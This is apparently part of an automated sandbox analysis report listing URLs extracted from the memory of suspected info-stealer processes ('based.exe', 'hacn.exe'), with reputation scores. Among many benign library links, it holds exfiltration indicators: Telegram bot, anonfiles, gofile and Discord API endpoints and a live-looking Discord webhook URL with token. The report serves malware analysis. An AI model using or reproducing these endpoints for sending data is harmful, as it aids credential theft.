                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot%s/%sbased.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.avito.ru/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://python.org/dev/peps/pep-0263/hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp, based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.leboncoin.fr/based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.microsoftCHROME~2.TXTy./based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://tools.ietf.org/html/rfc2388#section-4.4based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://weibo.com/based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.anonfiles.com/uploadbased.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.msn.combased.exe, 00000004.00000002.2386609527.00000201D1114000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://discord.com/api/v9/users/based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.microsoftISPLA~1.PNGy.based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.amazon.ca/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://json.orgbased.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxybased.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688hacn.exe, 00000003.00000002.1704402045.000002075C83C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381279282.00000201CFC48000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerhacn.exe, 00000003.00000003.1699100355.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1700843802.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690999931.000002075AFE3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1696726978.000002075AFD9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701432370.000002075AFFC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698584471.000002075AFEC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697785294.000002075AFE9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704358371.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701967125.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.amazon.com/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.micpowershell.exe, 00000011.00000002.2043962328.0000028A53BF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://httpbin.org/based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sbased.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.ecosia.org/newtab/based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brbased.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535based.exe, 00000004.00000003.1871128429.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382843962.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359818591.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380585995.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380067127.00000201D0905000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syhacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://MD8.mozilla.org/1/mbased.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://bugzilla.mobased.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tools.ietf.org/html/rfc6125#section-6.4.3based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://google.com/mailbased.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesbased.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pybased.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://foss.heptapod.net/pypy/pypy/-/issues/3539based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://google.com/based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.sectigo.com0based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.python.org/download/releases/2.3/mro/.hacn.exe, 00000003.00000002.1724401558.000002075D178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382218534.00000201D0540000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://discordapp.com/api/v9/users/based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/2920based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://yahoo.com/based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://account.bellmedia.cbased.exe, 00000004.00000002.2387954402.00000201D1C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6based.exe, 00000004.00000003.2380504617.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1871128429.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1858412342.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2378136053.00000201D0929000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1763481710.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359523519.00000201D0929000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.gofile.io/getServerr;rbased.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://login.microsoftonline.combased.exe, 00000004.00000002.2387954402.00000201D1C28000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://cacerts.digicert.cohacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://html.spec.whatwg.org/multipage/based.exe, 00000004.00000003.1857154542.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsbased.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.zhihu.com/based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installbased.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbased.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.rfc-editor.org/rfc/rfc8259#section-8.1based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://support.mozilla.org/products/firefoxgro.allbased.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.gofile.io/getServerbased.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://sectigo.com/CPS0based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icobased.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.amazon.co.uk/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.thawte.com0based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.gofile.io/getServerr;based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.python.org/dev/peps/pep-0205/hacn.exe, 00000001.00000003.1670114307.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1674833152.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690904651.000002075D06D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.wykop.pl/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://twitter.com/based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.olx.pl/based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.mozilla.org/products/firefoxbased.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1745863108.00000201D0CA5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://google.com/based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://google.com/mail/based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
